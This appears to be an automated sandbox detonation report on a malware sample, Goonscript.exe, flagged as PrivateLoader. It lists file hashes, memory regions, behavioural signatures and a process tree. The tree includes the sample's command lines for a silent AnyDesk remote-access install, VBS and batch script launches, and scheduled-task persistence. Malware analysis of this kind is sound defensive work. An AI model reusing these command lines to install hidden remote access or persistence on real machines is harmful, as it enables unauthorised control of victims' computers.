| SHA512 | ebfdff1d3a42c4b7b9af42d1b61045a336484c8f7a493192f27033833c5fd32ab36d49408e53b04c515bbb38ce85d0bfb6f5b4193f282aa6fd66b4f91c04cacb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 41a2509c2c582cf29f8db72aff49b149 |
| SHA1 | 1ad43b8b0ccc25270d42797df34cb462c972ff26 |
| SHA256 | 3c5332375e3c6368023532863d054db5594446ee8bc75a5ed9842fe319f904c9 |
| SHA512 | c5f0232973fe21a2e48df11f1fd76019247cfb00b75ac652bbd7e072465137652cc82eb8051aa19a176711f4d694819300763fa8202f570aaf26733a0dcfd2a6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JB8Q1DZR\favicon-32x32[1].png
| MD5 | fba1e37cf05b9842cbd7d21f72804a3b |
| SHA1 | 3a07073c3db0a8f053bf0124e7dcc8af39c88a51 |
| SHA256 | 841f4e9c552fd16ffef7bb69fabd47d233af71963311ff70434e39431735eb14 |
| SHA512 | 45dedea749ae1788fdf1c89ebd36d4c707563323f9d91a0825abc1d8a7b05cd36d126090b4a147443c27196764fd3cdb3ce43b8ba6bf82e3e3198917df409a4f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 05fdb033fcea44a00296bba27670b1f2 |
| SHA1 | ed3fc56a332947eed4108fe5c311869267c8571e |
| SHA256 | ba020f4b31fd19f6831186c11371771de07047d6426a73cd46f948836f259b2c |
| SHA512 | ffb646c6901d0d327e06d96eca551804467fbd30d202e33688c52a11bcdd416c3224c2beca6adba45b072f766970c067f89ca098bbe17446f1a7638088a69761 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2caf513a91eac56c00e25be92b544b9f |
| SHA1 | a22534c77e2d4a65d577c275319bd6f27abc3aa3 |
| SHA256 | afffb263f1fa86660a78f8cd22a82fd8fed2a8ffde1adebdf0ad189e8c788ed4 |
| SHA512 | 73f8505b96e070d4898991b574ccc100b51bf790b7293313d38cb23d18daf9287ec3b6a1e59ec58d63c89ef23555ddf5d6c4d17e30749c6ce016fc8735dd708d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a48beb8b05fc5e891826b070eb4f72a1 |
| SHA1 | 42cf9456d606b0a37ba80624faba17f27c0d325e |
| SHA256 | d8eca4e75fe4e8b45c9ba3f86e35279728f4f01e8ebd64973bdfd4359beeb95d |
| SHA512 | 954973da8051d4c952f241eef960f982e88aa082c525d6588b8b9b1fb5fddf79b4f44a5de4fdc4a052efadc0e1eeb71ceceb3d69853ec298d3f0ae610b33f256 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5f2a637c707aeebd226275c8abb1dee8 |
| SHA1 | b9e858c51afec0de0f8f5fa71ba96ddc3d0df699 |
| SHA256 | 588b9fca9e39d9f941ec36a97667b7a714bab32007a5a8a5107e9db61e8a55b4 |
| SHA512 | 2a2622c00926dd771c1bc04b18f2c0e601dc0af46f186fdb9dd71a2289141762364fb97e5cd4750d5d449f12a08044ae18bcc36a8455422cec2df85ea1ff5e9f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f1a77ccdda1cb95971f4600e929855de |
| SHA1 | 9e40ab12a7d0b802fe2aad24cc63e5d0bbc17480 |
| SHA256 | 0274423e4ad4e86f8298e631b9f7708a369eeeaecb8846ab039ae5bcc7b0880c |
| SHA512 | f6b57113aa663171b32ef8f30b0668ca8ed53e72117c1a3d2bad2428b3553a3e12ecf1c9ba5ed7246ec0f6b41aa88932b7889bc8c380fbecf81cf58352d52174 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 35cf8658453e6b11571f5d7a56a81ee7 |
| SHA1 | 2984658f81d91f93e29e491890d2fc1386f1d7c8 |
| SHA256 | dbfe1794e31bd1a2a4d1b032aaf0f4acfbe50b002264d927dc818f08f7af9a65 |
| SHA512 | 1a8cc1ffa79077f7376664f17afd0034e2c78c992386d66540400d30bc4ea4e7d4e7281d3d4e04f65af0480e2d188c264fb2cc21fbce65b5770000a657a15f41 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2cdf706f0e5ebbbe64df76d0fb3c997f |
| SHA1 | 46f3a2ab472f4c4e7fdd3303a23db8b320879b6f |
| SHA256 | 271924c3928b13dea204db5f2da279f0ed5bf86cdcc5aabd610a58e45e54df27 |
| SHA512 | c6890a164d9841a34670edf9fa996f96ae91b3095e8cd2f6d64e7a74d53e2a28d983c449631e4d000c0843256a21cbf04eeeab063e0c0088fdefdc6ca0ef971a |
memory/1476-1858-0x0000000000250000-0x0000000001999000-memory.dmp
memory/1640-1859-0x0000000000250000-0x0000000001999000-memory.dmp
memory/2164-1861-0x0000000000250000-0x0000000001999000-memory.dmp
memory/2168-1864-0x000007FEF6410000-0x000007FEF66C4000-memory.dmp
memory/2168-1871-0x000007FEF62C0000-0x000007FEF62D1000-memory.dmp
memory/2168-1879-0x000007FEF5FD0000-0x000007FEF5FE1000-memory.dmp
memory/2168-1898-0x000007FEF2DC0000-0x000007FEF2DD6000-memory.dmp
memory/2168-1900-0x000007FEF2CD0000-0x000007FEF2D32000-memory.dmp
memory/2168-1899-0x000007FEF2D40000-0x000007FEF2DB5000-memory.dmp
memory/2168-1897-0x000007FEFB1F0000-0x000007FEFB200000-memory.dmp
memory/2168-1896-0x000007FEF2DE0000-0x000007FEF2E04000-memory.dmp
memory/2168-1895-0x000007FEF2E10000-0x000007FEF2E38000-memory.dmp
memory/2168-1894-0x000007FEF2E40000-0x000007FEF2E96000-memory.dmp
memory/2168-1893-0x000007FEF5C60000-0x000007FEF5D25000-memory.dmp
memory/2168-1892-0x000007FEF5D30000-0x000007FEF5D41000-memory.dmp
memory/2168-1891-0x000007FEF5D50000-0x000007FEF5D63000-memory.dmp
memory/2168-1890-0x000007FEF5D70000-0x000007FEF5D9F000-memory.dmp
memory/2168-1889-0x000007FEF5DA0000-0x000007FEF5DF7000-memory.dmp
memory/2168-1872-0x000007FEF4910000-0x000007FEF59BB000-memory.dmp
memory/2168-1888-0x000007FEF5E00000-0x000007FEF5E11000-memory.dmp
memory/2168-1887-0x000007FEF5E20000-0x000007FEF5E37000-memory.dmp
memory/2168-1886-0x000007FEF5E40000-0x000007FEF5E51000-memory.dmp
memory/2168-1885-0x000007FEF5E60000-0x000007FEF5ECF000-memory.dmp
memory/2168-1884-0x000007FEF5ED0000-0x000007FEF5F37000-memory.dmp
memory/2168-1883-0x000007FEF5F40000-0x000007FEF5F70000-memory.dmp
memory/2168-1882-0x000007FEF5F70000-0x000007FEF5F88000-memory.dmp
memory/2168-1881-0x000007FEF5F90000-0x000007FEF5FA1000-memory.dmp
memory/2168-1880-0x000007FEF5FB0000-0x000007FEF5FCB000-memory.dmp
memory/2168-1878-0x000007FEF5FF0000-0x000007FEF6001000-memory.dmp
memory/2168-1877-0x000007FEF6010000-0x000007FEF6021000-memory.dmp
memory/2168-1876-0x000007FEF6030000-0x000007FEF6048000-memory.dmp
memory/2168-1875-0x000007FEF6050000-0x000007FEF6071000-memory.dmp
memory/2168-1874-0x000007FEF6080000-0x000007FEF60BF000-memory.dmp
memory/2168-1873-0x000007FEF60C0000-0x000007FEF62C0000-memory.dmp
memory/2168-1870-0x000007FEF6A40000-0x000007FEF6A5D000-memory.dmp
memory/2168-1869-0x000007FEF6A60000-0x000007FEF6A71000-memory.dmp
memory/2168-1868-0x000007FEF7020000-0x000007FEF7037000-memory.dmp
memory/2168-1867-0x000007FEFB200000-0x000007FEFB211000-memory.dmp
memory/2168-1866-0x000007FEFB220000-0x000007FEFB237000-memory.dmp
memory/2168-1865-0x000007FEFB240000-0x000007FEFB258000-memory.dmp
memory/2168-1862-0x000000013F400000-0x000000013F4F8000-memory.dmp
memory/2168-1863-0x000007FEFB260000-0x000007FEFB294000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bfd88b827f08bf3789d8ac211f2e5e81 |
| SHA1 | 84c91cff364d6b9c7c5444652d9b0f72a08e54d3 |
| SHA256 | 7896c86656eff8ad59643a16357bfe18670017dd1d4827087862ca76a3aee1f2 |
| SHA512 | e1d9b492385d4ee63cdfbd7ca482d531c30711915f370b61375e91fd38847d113203737b84a5dcc4f2ad11c6f3d1b482c156a9a31fbcf87cb922ab1a992da47b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | afc1a3c89734bb1f288126a6915d8e7c |
| SHA1 | 88de6080044b328b0eed412f3816d966cb31ea04 |
| SHA256 | 09374b02e53608e82443959b9d2439a3a94a75cc87e72b8a4e844aa55ad9e1a3 |
| SHA512 | 2beb608ad996a8d279c324d659ebb45e462d2f5fbf718ab26ef0e4a61d9f9da11d63182d847445c148b9aeafe59051a12ee7c42f63635db71bf95399773c0196 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 8d951d301a4c405355fe3a0b42013c4a |
| SHA1 | 7d91685d8989ec63a154e5692ad8f57297d09a7f |
| SHA256 | 343f89d4e0138b5644db6aebcc26b2d1269c15b3dfdf1393c1d6796d3055914f |
| SHA512 | 3636ea7fdb169b69a1a4f988ab4f782d573cadb0fac2a30bf88b6634e5e10a73750cf7613b8324ee9ab0bdba4b7200ba48dbea3a0e546ed4497b6c60490ef3d5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a0e749e19399649e099feeefc72239d8 |
| SHA1 | b706509aaf2409dfdf2899eb749ace148fab7445 |
| SHA256 | 8e4e872521f30f1efb2edc5fc6ae9e1056837d237b42bcf2923bd9b66eff9a7c |
| SHA512 | bf0343385b2fa395c7176e58b21b93c7b61eb9fd3b57effc73b01cd2804d8ec65e0d61730fd95a9ec917c73efe6968c94c800e05d1d3fc0e4833742c9765dfa6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2d05c3756dfb6fddc1b587bef8f7d4d0 |
| SHA1 | 6c1349b0572477e5db36323b6bb2ff3ad811ac94 |
| SHA256 | 0f1329d586f786f15cd9df273ee5e15863507358c2bc3c7b78ba0ba2ad2c6c06 |
| SHA512 | 0ba5c5021239b47978f30599c43c985566d5f1bd0e6f1c7f2f59edb4e814cc8a17a2bb2a90633e98e6445093918ea9f76800e8523edfa1385cd39b1a729cdce1 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bc316bb81383ca854335167818bc667b |
| SHA1 | 06eafe4f80e101a30567cc5c8cf486ad256178c1 |
| SHA256 | 12563580b9734140f377609581b8a0f423f2c7f6f9d72e3cdf8c6e2f3fc90ee0 |
| SHA512 | b43c977ea8182327d9b3d42f501c8f39de508405ccc1c43ef9e4cb97a8ba075b608b4a26043d7b43ac900506a00dd834cdd731a04f642aed7cfa92bd07f4bed9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4ec32abff877c551f010f4e14a3cdafb |
| SHA1 | 9fd1fee5923dbb9c433b4729c5d3852899389aa4 |
| SHA256 | 168f117332fdf53566d60cf48718ecdef9aa2d064fe54ed3f1eca9683424278a |
| SHA512 | 310b557abe60beff8ecd068198526cfcf0b8f0a46e27511e19ccf2ccb85b402869ef90771dce9bf9bd13c5b20d0c8235fa70d3760aeb54d53ae890d81ecadb77 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | e4a68ac854ac5242460afd72481b2a44 |
| SHA1 | df3c24f9bfd666761b268073fe06d1cc8d4f82a4 |
| SHA256 | cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f |
| SHA512 | 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 304ac5b2bfdebebaa620c4c75e06a809 |
| SHA1 | ec92ada3de18ff4200512d72c52de905dca46efe |
| SHA256 | 796f37df70eeae925550961ae8a8d44181e1d319e0935edc665121e127156c9c |
| SHA512 | 06046386c8edf9d184b0d9bbdf1b4561444ae8bae954baa207f4401d7e1d91f98ce8a96c596f5a13b6bcb0764e0226bbc0e1cb8b9b99c58bb050056831f1de02 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c5d4694d5ae83bc3932abf5a3dc4854c |
| SHA1 | 34f7757aa1bc0da8be8d8450c098db9c85df3498 |
| SHA256 | 2c3cf4b2d6a10b5ef48190d914938bc051efcb46e85ef47687888ba3c3f5b156 |
| SHA512 | 311e22492fe78268d6549e628c79e9d9468ef1affb7143019ae5537bf2be82fc0f947510aac85df8292a92046ac68e2f442c8817956ae4333913b15599fcdf75 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | d357b725d05a638484e8b492600e197b |
| SHA1 | 83244ef16a0d6471cd811eb15f2843118c596bfd |
| SHA256 | 3d1eaac1f6b2d1425909e0c38968009d4c9de9de6abce939d06e4e12491e0fa8 |
| SHA512 | 4db32e851aca535d9520a04b3b95721ad897fa2093baca8c76c76972cc43fbc747ef12870904d31fd7aa4c62283ca45bb8944c20ca7fe648f412a9cbb5b9ca6e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f42ac14cee5dc409f20b2e50a7909ad7 |
| SHA1 | af30f9a96a61c7f5df3275b3e8da440dc9ce499d |
| SHA256 | 37f99855cb765f4b9ff8aee8664d581681f56d424f3d6bc6e76d53ea1f4f743b |
| SHA512 | 4c74ee2a57f14aaea0cfbad801b1fdeb8c7b0f9737d2ac60148c49c33afc35e7b231293470863735787ed7cf3bb68df61b74107652f10c51fb17bb2284b833dc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b55da9f2032ffb0f9e9950abc7fb7ba7 |
| SHA1 | 62917a7d99ec6c71ee42b8214f57602db71131c1 |
| SHA256 | 2ce119f66793101ba85ef9d3e03ee78f0f12c2f121edbd591057a7d1cec589ac |
| SHA512 | 52711bc437b7e61096f10ec409b250e7d59a7bc5106af32cff912a37fd0c353dd1bf4a1aeb9938772c2406984be6cc8eb0f61fab724a41e5ba19eef55756bd94 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-09 18:38
Reported
2024-05-09 18:40
Platform
win10v2004-20240508-en
Max time kernel
143s
Max time network
151s
Command Line
Signatures
PrivateLoader
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Goonscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\doorbell-sys.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\ProgramData\AnyDesk.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\doorbell-sys.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Checks installed software on the system
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\AnyDesk.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\AnyDesk.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Goonscript.exe
"C:\Users\Admin\AppData\Local\Temp\Goonscript.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\E781.tmp\E782.tmp\E783.vbs //Nologo
C:\Users\Admin\AppData\Roaming\doorbell-sys.exe
"C:\Users\Admin\AppData\Roaming\doorbell-sys.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EA41.tmp\EA42.tmp\EA43.bat C:\Users\Admin\AppData\Roaming\doorbell-sys.exe"
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-service
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-control
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4360,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3596 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/Y6e79
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4908,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4972 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4964,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=5344,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5444 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5588,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5592 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
